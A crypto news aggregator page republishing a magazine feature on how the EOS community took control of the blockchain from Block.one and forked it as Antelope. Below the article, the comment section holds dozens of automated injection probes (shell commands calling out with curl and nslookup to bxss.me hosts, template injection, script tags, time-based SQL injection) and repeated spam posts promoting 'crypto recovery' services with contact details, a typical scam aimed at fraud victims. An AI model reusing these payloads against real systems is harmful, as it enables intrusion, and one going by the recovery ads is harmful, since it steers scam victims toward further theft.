This site uses cookies. Browsing the site, you agree to the use of cookies. If you need more information, please visit the Cookies Policy page
Cryptocurrencies: 9544 / Markets: 113022
Market Cap: $ 3 741 613 272 114 / 24h Vol: $ 204 594 956 552 / BTC Dominance: 59.59388436323%

Н News

Whatever happened to EOS? Community shoots for unlikely comeback

magazine-EOS-community-takeover-scaled.jpg

The EOS community took on the centralized company behind the blockchain — and won. Now comes the fight to get back into the top ten.

Whatever happened to EOS? After the biggest ICO in history, the former top 10 token now languishes around number 53. But the community has since taken back control and is determined to restore the smart contract platform to its former glory.

If youre a newcomer to the crypto industry, you may not even be familiar with The Biggest ICO in History, which launched EOS.

EOS began in June 2018 with great fanfare, an active community and strong tech. Led by Dan Larimer, of Steemit and Bitshares fame, there was a palpable area of excitement with the introduction of new tech, including the delegated proof-of-stake (DPoS) system and EOS Worker Proposals to fund projects that grew the ecosystem.

Block.one, the company behind EOS, raised an astonishing massive $4.1 billion over 12 months.

And then nothing much happened. The community waited and waited for the promises to be fulfilled.

Douglas Horn, CEO of GoodblockDouglas Horn, CEO of Goodblock. (Supplied)

I was very disappointed when little or none of those ideas came to fruition, Douglas Horn, CEO of Goodblock, tells Magazine. To be honest, I would say Block.one did a deceitful ICO, whether that was planned from the beginning or not. Thats my personal assessment.

The exact reasons EOS didnt go anywhere are disputed, but development dried up, and the community often felt left out. Some say they volunteered to take on the development of new projects but werent supported or even told to halt work by Block.one, as their efforts encroached on developments of its own. In other cases, micro-grants were given on the proviso that no other funding could be used. Typically, those micro-grants were not enough and those mini-projects also ran out of runway.

Also read: Journeys in Blockchain William Quigley of WAX

There are some success stories, with WAX and Alien Worlds the exceptions that prove the rule, but otherwise, it was a moribund ecosystem. In the interim, Block.one came to an agreement with the SEC to pay a fine of $24 million in order to avert any suspicion that the token was a security (an agreement that has subsequently been overturned and which may cause significant new problems for Block.one).

Timeline of a takeoverTimeline of a takeover. (EOS Network Foundation)

Two white elephants

Despite the many promises, Block.one basically stopped developing the base tech, then termed EOSIO, and diverted its focus to two vanity projects: the $150 million Voice decentralized social media platform that has since transformed into an unimpressive NFT marketplace; and Bullish, an exchange that ostensibly used the ICO money to provide liquidity. Trade volumes are around $200,000 a day for its BTC/USDC pair.

(Block.one, former chief technology officer Larimer and CEO Brendan Blumer were contacted for comment.)

So in 2021, the community started fighting back with the formation of the EOS Network Foundation. Enter Yves La Rose, CEO of EOS Nation, an original block producer, into the fray. Block producers in EOS provide the tech to validate nodes, with the top 21 receiving a fee for maintaining the network.

La Rose is not without his critics, with some of those in the original Block.one brigade calling him a bully. On the other side, the newly energized EOS community sees him as a bit of a hero. And since history is written by the victors, it looks as though La Rose is going to emerge as the latter.

BullishBullish exchange is still in operation. (Twitter)

Who is Yves La Rose?

Yves La Rose, CEO of ENFYves La Rose, CEO of ENF. (Supplied)

La Rose is a self-confessed nerd who started tinkering with his own computers when he was only six years old. Years later, he read the Bitcoin white paper and became a miner. But this didnt last very long. He could see there was very little scope for lone miners, and he didnt want to join a mining pool.

By 2016/2017, he could see a resurgence that offered more choices. ICOs were starting to become popular and CryptoKitties famously log-jammed the Ethereum blockchain. La Rose also became aware of Larimer and was seriously impressed with his crypto record and the new tech he was building for EOS.

I chose EOS early on, says La Rose. And I made the leap into blockchain full time, forming EOS Nation back in January 2018 prior to the launch of the mainnet. And we waited.

He was not the only block producer to find out that while ICO promises are easy, execution is hard.

EOS upgradeEOS upgrades to Antelope in 2022 (Twitter)

None of those ideas came to fruition

Horn, previously the architect of Telos, is now the CEO of Goodblock, which provides foundational Web3 tools. Like La Rose, he was attracted by the potential of the tech offered by EOS by DPoS, the governance systems and the planned worker proposals. He, too, grew disillusioned and co-founded the Telos Blockchain in direct response to the absence of any perceptible activity by Block.one on the EOSIO code.

In my personal opinion, I think the whole Block.one fiasco was an absolute fraud, Horn says.

Of course, any lawyers reading this should take this as an exaggerated expression of opinion, rather than a criminal accusation, but it does show the depth of frustration that led him to draft the Telos white paper.

Instead of waiting for them to fulfill their promises, I started to build and I was also very outspoken in my views, says Horn. He pushed for a roadmap from Block.one and when it was not forthcoming, he built his own for Telos.

Horn is renowned for his outspoken views but they are echoed across the community. However, some players prefer not to be named for fear of attracting blowback.

La Rose sees the problem coming from the fact that the ICO was just too damn big and Block.one promised too much.

There were a lot of expectations in the EOS community and I dont think Block.one had the skills to actually fill those shoes. Then we suffered one failed promise after the other. By the second anniversary, it was obvious they were not going to deliver anything on the code or for the community, says La Rose.

It was then that the ecosystem started hemorrhaging developers and community members. We tried to fill the gaps but without funding it was impossible. Other chains were popping up all the time and they secured funding and, more importantly, they set up foundations.

Rhett Oudkerk Pool, CEO ZaisanRhett Oudkerk Pool, CEO Zaisan. (Supplied)

Rhett Oudkerk Pool, another original block producer with EOS Amsterdam and subsequently Europechain and Zaisan, also sees the massive success of the ICO as part of its downfall.

They claimed they were tied up in legal wrangles with the SEC, and that sort of made sense. They said they were tied up in investigations and, as a result could not do anything. But then, if someone in the community wanted to create a worker proposal system, Block.one said they were already working on it. Theyd say dont worry, well do it. So the community would stop but Block.one never did anything and so they doubly killed initiative, says Oudkerk Pool.

La Rose resigned from EOS Nation to form the EOS Network Foundation (ENF) in August 2021. From the get-go, La Rose knew that all layer ones need a funded Foundation which would work to nurture the ecosystem, foster new development and oversee continued governance. Without Block.one at the helm, the ecosystem needed direction and leadership.

EOS community steps up

Daniel Keyes, CEO EOS nationDaniel Keyes, CEO of EOS Nation. (Supplied)

Daniel Keyes took over as CEO of EOS Nation after La Rose left, and hes also CEO of the community crowdfunding platform Pomelo, which was built after the velvet EOS revolution and helps fund projects on the network.

We had the community but no funding. We had a lot of broken hearts, and the community just left because they had to survive, he says, looking back.

Yves left EOS Nation to try and save the network. It was a lofty goal at that stage and there were several failed attempts, says Keyes.

Aaron Cox, CEO of Greymass, another EOS block producer, says, There was development happening in isolation but one of the biggest problems was this behemoth in the corner that just stamped over everyones efforts. We needed to stick together.

Decentralization takes on centralization

La Roses road to resignation took some time. He was originally drawn to the EOS white paper and, in particular, the worker proposal system it outlined but which never launched. La Rose says he tried a number of times to launch it and would get the backing of the community before Block.one essentially killed the proposals off.

There were veiled threats from Block.one, says La Rose.

The second EOS conference was held in Rio in September 2020 and was a very grassroots affair. Again, La Rose and the other block producers worked hard to create a worker proposal system (WPS) and gained the backing of some 40-plus signatories. This was also canceled by Block.one.

At this stage, we knew we could not work with Block.one again, says La Rose. Everything that had been promised could just be words, but GitHub did not lie.

Marshaling the community against Block.one was difficult because of the intrinsic nature of decentralization. Momentum would be gathered but then lost as people drifted away after unsuccessful attempts to wrestle back control.

In June 2021, La Rose stepped down from EOS Nation. Hed given the past 40-odd months to EOS and he didnt want to bow out. He also knew EOS needed a foundation, and he could not be both a block producer and a stakeholder in a foundation.

He began planning and talking to the other block producers about what they wanted and what the newly formed ENF would look like.

At the end of the day this part was easy. Everyone knew something had to happen. Making it happen was a lot harder.

Oudkerk Pool remembers with happiness how La Rose persuaded 15 out of the 21 block producers to join together to stop the staking contract basically diverting revenue from Block.one back to the community. This was a watershed moment as it stopped Block.one from receiving funding from the community and it was only possible to change the contract with the agreement of 15 block producers.

First you get the money, then you get the power

The initial idea was that we could use this money to work on the software. And La Rose used that money to reward struggling block producers who had been working away with no funds. He asked for blue papers to outline what would happen next and we were given the role of writing the Core+ Blue Paper, an overview document to replace the white paper but there were seven documents altogether that covered the wallets, the yield etc, says Oudkerk Pool.

Our own role was to do a commercial outreach and we took an EOS roadshow all over Europe and Dubai, says Oudkerk Pool.

Other coalitions were forming, in particular over the software. Horn was instrumental here.

I knew we needed a roadmap and a plan. I stepped up to the plate and soon we had four block producers looking at the code the Antelope Coalition was formed to replace the now stagnant EOSIO platform. We were now in the driving seat, says Horn. We had our Jerry Maguire moment where we (Telos) said we were in and Yves said yes.

EOS, block producer UX, WAX and Telos joined forces to run the Antelope Coalition, a new group to build and maintain the EOS source code on GitHub. The team renamed EOSIO to Antelope at this stage, forking the code permanently. A number of key technologies were identified and work began on Inter Blockchain Communication (IBC) and implementation of the Ethereum Virtual Machine (EVM), which went live mid-April.

You heard the news – London baby! Which of the 35 neighborhoods are you going to be focusing on? To motivate you, we sent Miles through an AI portal to sightsee pic.twitter.com/dSOCzsU1EH

— Upland (@UplandMe) April 24, 2023

Wax and Upland fly the flag for EOS

Not everything on EOS had stalled and a couple of well-known projects successfully built their own ecosystems.

Lukas Sliwka, CTO of WAXLukas Sliwka, CTO of WAX. (Supplied)

Lukas Sliwka, chief technology officer of WAX, spent the second half of 2018 building his blockchain team, hiring the right people and then running different POCs before essentially choosing EOSIO and launching the WAX blockchain in 2019. WAX, or WorldWide Asset eXchange, is a gaming and NFT platform.

According to Sliwka, WAX is one of the most successful blockchains in the sector and, during the bull run in 2020/2021, averaged between 25 and 28 million transactions per day.

Sliwka says the project deliberately distanced itself from EOS. WAX is probably one of the best-kept secrets in the blockchain world as a result, he says.

We basically took on the maintenance and protocol development ourselves that is, until the Antelope Coalition was formed, he says.

Also read: William Shatner tokenizes his favorite memories on the WAX blockchain

We already had our own blockchain protocol team, so we could hit the ground running. For example, as good as the Antelope stack is, there were issues on scaling which is a key learning point from WAX, he says.

We saw our own blockchain grow by 50,000 to 70,000 accounts a day and that takes some serious scaling resources. I put my hand up from the start on scaling and also inter blockchain connection.

Upland.me, a metaverse property game following along the lines of the board game Monopoly, was also sitting on the sidelines, building its community. It actually did receive some of the funding from Block.one, in the form of the Finlab EOS VC Fund, which amounted to $18 million and allowed them to build without having to wait.

Co-founder Dirk Leuth says the coalition was exciting but there were teething troubles.

It's official!

The $EOS Network has successfully completed its consensus upgrade to @AntelopeIO Leap 3.1

By doing so, the #EOS community has declared independence, exemplifying the new balance of power created by #Web3.

Happy EOS Independence Day! https://t.co/iV2FTZOY9x pic.twitter.com/J8daOedun6

— EOS Network Foundation (@EOSnFoundation) September 21, 2022

EOS independence day

La Rose sees one benefit to the delays of actually kick-starting the blockchain that it allowed the ENF to learn from the mistakes of other layer ones, which came later. It also allowed him to try and work with EOS founder Larimer which ultimately failed.

A spokesperson for ENF said although Larimer continued to be an active member of the community through March 2022, his last contribution was when he shipped EOSIO/Mandel 3.0 at the end of January 2022.

There is some chat that Larimer was pushed out, but the mainstream conversations seem to indicate that the founder was still following the Block.one line, which was inconsistent with the new ENF policies.

As La Rose says: Fool me once thats on you, fool me twice and thats on me. We opted for EOS independence. With the Antelope Coalition, we rebranded the core code stack and we now maintain, grow and develop it. We hard-forked in September 2022 and that was the final nail in the coffin for Block.one.

Thats what we call EOS independence.

A key component in the new EOS ecosystem is that there are formal, well-oiled mechanisms on how to access funding either through Pomelo or the direct grant framework from ENF, which can reach up to $200,000. The EVM was launched in mid-April with a focus on gaming. A sizable tranche of funding a $20 million fund is allocated to this sector out of a total of $65 million.

Major News for $EOS

After over a year of dedicated work by contributors across the ecosystem, #EOS EVM Mainnet Beta is finally live

Full Announcement https://t.co/ayYqn7V0oo

EVM Web Portal https://t.co/6EHGzEh1b8 pic.twitter.com/W7Rq2jdDZd

— EOS Network Foundation (@EOSnFoundation) April 14, 2023

ENV (V stands for Ventures) is the new $100 million-plus funding vehicle also set up by La Rose. It is a for-equity venture which is owned and operated by the ENF DAO.

No one denies there were many mistakes along the way. For Horn, it was the delays, which means theyre only getting up to full speed now.

Keyes is in agreement. We are in catchup mode now. But were in a good position now to attract Web3 builders out there.

Recently, the #ENF announced a $60M partnership between @DwfLabs and the $EOS ecosystem

Read all about the massive impact this will have on #EOS a recent feature with @Cointelegraph

Read Now https://t.co/zQjpkzx7GV pic.twitter.com/SPl6zRPZ7w

— EOS Network Foundation (@EOSnFoundation) April 22, 2023

The future of EOS

Aaron Cox, CEO of GreymassAaron Cox, CEO of Greymass. (Supplied)

Cox is also optimistic. I think the presence of our independent consensus mechanisms is the best outcome for our family of blockchains. We have this vibrant ecosystem of chains that exist today and there will be new chains dreamt up next year. We have momentum now.

Sliwka says hes also excited about the possibilities. What gets me excited is the fact that we, as a coalition, are going to solve these problems so we can all benefit. That is what Yves has done he transformed the ecosystem into something that was originally promised.

When asked about what was the most important element in the EOS revival tech, funding or community, the community gets the biggest vote from the interviewees. Although Cox reasonably points out that the ecosystem really needs all three to be a success.

Yves la Rose has really stepped up in a David versus Goliath battle. At times he has been hampered by the vision of a truly decentralized blockchain, at other times, that has been the strength. But he pays tribute to everyone else involved.

I may be the guy on camera for the revival but without the hundreds of people working daily on this project, it would not have happened. Its a humbling experience to be part of this movement, he says.

Subscribe
The most engaging reads in blockchain. Delivered once a week.

Email address

SUBSCRIBE

Subscribe to Magazine by Cointelegraph Newsletter.

Source

  • 09.10.25 08:08 pHqghUme

    &(nslookup -q=cname hitgrfzhgegxdb7bdf.bxss.me||curl hitgrfzhgegxdb7bdf.bxss.me)&'\"`0&(nslookup -q=cname hitgrfzhgegxdb7bdf.bxss.me||curl hitgrfzhgegxdb7bdf.bxss.me)&`'

  • 09.10.25 08:08 pHqghUme

    |(nslookup -q=cname hitfmymffseet6e8b2.bxss.me||curl hitfmymffseet6e8b2.bxss.me)

  • 09.10.25 08:08 pHqghUme

    `(nslookup -q=cname hitohduurqhba06a59.bxss.me||curl hitohduurqhba06a59.bxss.me)`

  • 09.10.25 08:08 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:08 pHqghUme

    ;(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)|(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)&(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)

  • 09.10.25 08:08 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitanwkhusxwr37069.bxss.me||curl${IFS}hitanwkhusxwr37069.bxss.me)

  • 09.10.25 08:09 pHqghUme

    &(nslookup${IFS}-q${IFS}cname${IFS}hitochckpfbtw00d29.bxss.me||curl${IFS}hitochckpfbtw00d29.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitochckpfbtw00d29.bxss.me||curl${IFS}hitochckpfbtw00d29.bxss.me)&`'

  • 09.10.25 08:09 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}

  • 09.10.25 08:13 pHqghUme

    '"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?9425407

  • 09.10.25 08:13 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:14 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:16 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    "+response.write(9043995*9352716)+"

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    $(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    |(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)

  • 09.10.25 08:18 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:19 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:22 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:23 pHqghUme

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  • 09.10.25 08:24 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:24 pHqghUme

    e

  • 09.10.25 08:24 pHqghUme

    can I ask you a question please?-1 waitfor delay '0:0:15' --

  • 09.10.25 08:25 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --

  • 09.10.25 08:26 pHqghUme

    can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--

  • 09.10.25 08:26 pHqghUme

    e

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'"

  • 09.10.25 08:28 pHqghUme

    @@olQP6

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891)

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891 from DUAL)

  • 09.10.25 08:30 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:33 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:35 pHqghUme

    e

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:40 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:40 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:41 pHqghUme

    e

  • 09.10.25 08:41 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:42 pHqghUme

    e

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 11.10.25 04:41 luciajessy3

    Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…

  • 11.10.25 10:44 Tonerdomark

    A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 19:53 Tonerdomark

    A crook swiped my Dogecoin. It ruined my whole world. Then Mr. Sylvester showed up. He fixed it all. He pulled back €211,000 for me. Not one cent missing from my profits. His steady cool and sharp tech know-how won back my trust. I got my money smooth and sound. After endless worry, relief hit me hard. I trusted him completely. Lost cash to a scam? Hit him up now at { yt7cracker@gmail . com }. His aid turned my life around. WhatsApp at +1 512 577 7957.

  • 12.10.25 21:36 blessing

    Writing this review is a joy. Marie has provided excellent service ever since I started working with her in early 2018. I was worried I wouldn't be able to get my coins back after they were stolen by hackers. I had no idea where to begin, therefore it was a nightmare for me. However, things became easier for me after my friend sent me to [email protected] and +1 7127594675 on WhatsApp. I'm happy that she was able to retrieve my bitcoin so that I could resume trading.

  • 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

To join the Chat, you need a free pro-blockchain.com account. Enter Registration
Have questions?
We're available 24/7
Help Icon